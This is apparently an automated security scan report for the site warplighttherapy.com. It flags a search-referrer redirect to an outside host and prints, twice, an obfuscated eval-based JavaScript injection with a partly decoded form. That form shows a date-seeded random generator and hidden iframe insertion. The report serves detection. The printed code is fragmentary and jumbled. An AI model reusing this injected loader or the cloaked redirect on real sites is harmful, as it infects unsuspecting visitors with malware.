Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.warplighttherapy.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.warplighttherapy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:09:33 GMT Location: http://bobomo.mynumber.org/ Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.warplighttherapy.com/ | 200 OK Content-Length: 3780 Content-Type: text/html | clean |
http://www.trustlogo.com/trustlogo/javascript/trustlogo.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:09:33 GMT Location: https://trustlogo.com/trustlogo/javascript/trustlogo.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
https://trustlogo.com/trustlogo/javascript/trustlogo.js | 200 OK Content-Length: 17791 Content-Type: application/x-javascript | clean |
http://www.warplighttherapy.com//siteseal.ratepoint.com/71800/seal.js/ | 404 Not Found Content-Length: 6872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101,3
try{asgasg&13}catch(asga){e("if(1)"+s);}
Decoded script:
if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return
Antivirus reports:
http://www.warplighttherapy.com/test404page.js | 404 Not Found Content-Length: 6872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101,3
try{asgasg&13}catch(asga){e("if(1)"+s);}
Decoded script:
if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return
Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=warplighttherapy.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://warplighttherapy.com/
Result: warplighttherapy.com is not infected or malware details are not published yet.